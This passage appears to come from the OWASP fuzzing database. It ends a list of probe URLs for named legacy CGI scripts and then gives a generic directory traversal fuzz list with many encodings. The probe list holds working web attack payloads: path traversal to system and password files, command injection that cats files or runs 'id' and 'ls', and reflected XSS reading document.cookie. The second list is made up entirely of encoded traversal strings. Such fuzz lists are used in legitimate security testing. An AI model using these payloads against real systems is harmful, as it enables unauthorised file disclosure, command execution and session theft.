probecontrol.cgi?command=enable&username=cancer&password=killer<br />
processit.pl<br />
profile.cgi<br />
pu3.pl<br />
publisher/search.cgi?dir=jobs&template=;cat%20{KNOWNFILE}|&output_number=10<br />
query<br />
query?mss=%2e%2e/config<br />
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&cart_id=<br />
quikstore.cfg<br />
quizme.cgi<br />
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}<br />
ratlog.cgi<br />
redirect<br />
register.cgi<br />
replicator/webpage.cgi/<br />
responder.cgi<br />
retrieve_password.pl<br />
rksh<br />
rmp_query<br />
robadmin.cgi<br />
robpoll.cgi<br />
rpm_query<br />
rsh<br />
rtm.log<br />
rwcgi60<br />
rwcgi60/showenv<br />
rwwwshell.pl<br />
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1<br />
sawmill?rfcf+%22<br />
sbcgi/sitebuilder.cgi<br />
scoadminreg.cgi<br />
scripts/*%0a.pl<br />
search.cgi<br />
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini<br />
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini<br />
search.php?searchstring=<script>alert(document.cookie)</script><br />
search.pl<br />
search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('XSS')</script><br />
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00<br />
search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc<br />
sendform.cgi<br />
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message<br />
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}<br />
session/adminlogin<br />
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}<br />
sh<br />
shop.cgi?page=../../../../../../..{KNOWNFILE}<br />
shop.pl/page=;cat%20shop.pl|<br />
shop/auth_data/auth_user_file.txt<br />
shop/orders/orders.txt<br />
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}<br />
shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20{KNOWNFILE}|<br />
show.pl<br />
showcheckins.cgi?person=<script>alert('XSS')</script><br />
showuser.cgi<br />
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|<br />
simplestguest.cgi<br />
simplestmail.cgi<br />
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|<br />
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|<br />
sojourn.cgi?cat=../../../../../../../../../../etc/password%00<br />
spin_client.cgi?aaaaaaaa<br />
ss<br />
sscd_suncourier.pl<br />
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}<br />
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E<br />
stat.pl<br />
stat/<br />
stats-bin-p/reports/index.html<br />
stats.pl<br />
stats.prf<br />
stats/<br />
stats/statsbrowse.asp?filepath=c:\&Opt=3<br />
stats_old/<br />
statsconfig<br />
statusconfig.pl<br />
statview.pl<br />
store.cgi?<br />
store/agora.cgi?cart_id=<script>alert('XSS')</script><br />
store/agora.cgi?page=whatever33.html<br />
store/index.cgi?page=../../../../../../../..{KNOWNFILE}<br />
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00<br />
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00<br />
survey<br />
survey.cgi<br />
sws/admin.html<br />
sws/manager.pl<br />
tablebuild.pl<br />
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&action=view&matchview=1<br />
tcsh<br />
technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../..{KNOWNFILE}<br />
test-cgi.tcl<br />
test-cgi?/*<br />
test-env<br />
test.cgi<br />
test/test.cgi<br />
texis/junk<br />
texis/phine<br />
textcounter.pl<br />
tidfinder.cgi<br />
tigvote.cgi<br />
title.cgi<br />
tpgnrock<br />
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
troops.cgi<br />
ttawebtop.cgi/?action=start&pg=../../../../../../../../../..{KNOWNFILE}<br />
ultraboard.cgi<br />
ultraboard.pl<br />
unlg1.1<br />
unlg1.2<br />
update.dpgs<br />
upload.cgi<br />
uptime<br />
urlcount.cgi?%3CIMG%20<br />
ustorekeeper.pl?command=goto&file=../../../../../../../../../..{KNOWNFILE}<br />
utm/admin<br />
utm/utm_stat<br />
view-source<br />
view-source?view-source<br />
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00<br />
viewcvs.cgi/viewcvs/?cvsroot=<script>alert('XSS')</script><br />
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\<br />
viewlogs.pl<br />
viewsource?{KNOWNFILE}<br />
viralator.cgi<br />
virgil.cgi<br />
vote.cgi<br />
vpasswd.cgi<br />
vq/demos/respond.pl?<script>alert('XSS')</script><br />
w3-msql<br />
w3-sql<br />
wais.pl<br />
way-board.cgi?db={KNOWNFILE}%00<br />
way-board/way-board.cgi?db={KNOWNFILE}%00<br />
webais<br />
webbbs.cgi<br />
webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20{KNOWNFILE}<br />
webcart/webcart.cgi?CONFIG=mountain&CHANGE=YE<br />
webdist.cgi?distloc=;cat%20{KNOWNFILE}<br />
webdriver<br />
webgais<br />
webif.cgi<br />
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
webmap.cgi<br />
webnews.pl<br />
webplus?about<br />
webplus?script=../../../../../../../../../..{KNOWNFILE}<br />
websendmail<br />
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}<br />
webutil.pl<br />
webutils.pl<br />
webwho.pl<br />
where.pl?sd=ls%20/etc<br />
whois.cgi?action=load&whois=%3Bid<br />
whois.cgi?lookup=;&ext=/bin/cat%20{KNOWNFILE}<br />
whois/whois.cgi?lookup=;&ext=/bin/cat%20{KNOWNFILE}<br />
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}<br />
windmail<br />
wrap<br />
wrap.cgi<br />
ws_ftp.ini<br />
www-sql<br />
wwwadmin.pl<br />
wwwboard.cgi.cgi<br />
wwwboard.pl<br />
wwwstats.pl<br />
wwwthreads/3tvars.pm<br />
wwwthreads/w3tvars.pm<br />
wwwwais<br />
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00<br />
zsh<br />
</pre><br />
<br />
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879) ===<br />
<pre><br />
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) <br />
# Derived from the awesome "Directory Traversal Fuzzing Code" v0.2 by Luca Carettoni<br />
# Did some cleanup & removed anything to the right of {FILE} for inclusion in a<br />
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. <br />
# adam.muntner@uietmove.com <br />
<br />
../{FILE}<br />
../../{FILE}<br />
../../../{FILE}<br />
../../../../{FILE}<br />
../../../../../{FILE}<br />
../../../../../../{FILE}<br />
../../../../../../../{FILE}<br />
../../../../../../../../{FILE}<br />
..%2f{FILE}<br />
..%2f..%2f{FILE}<br />
..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
..%252f{FILE}<br />
..%252f..%252f{FILE}<br />
..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
..\{FILE}<br />
..\..\{FILE}<br />
..\..\..\{FILE}<br />
..\..\..\..\{FILE}<br />
..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\..\{FILE}<br />
..%255c{FILE}<br />
..%255c..%255c{FILE}<br />
..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%5c..%5c{FILE}<br />
..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
..%c0%af{FILE}<br />
..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
..%%32%66{FILE}<br />
..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}<br />
%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
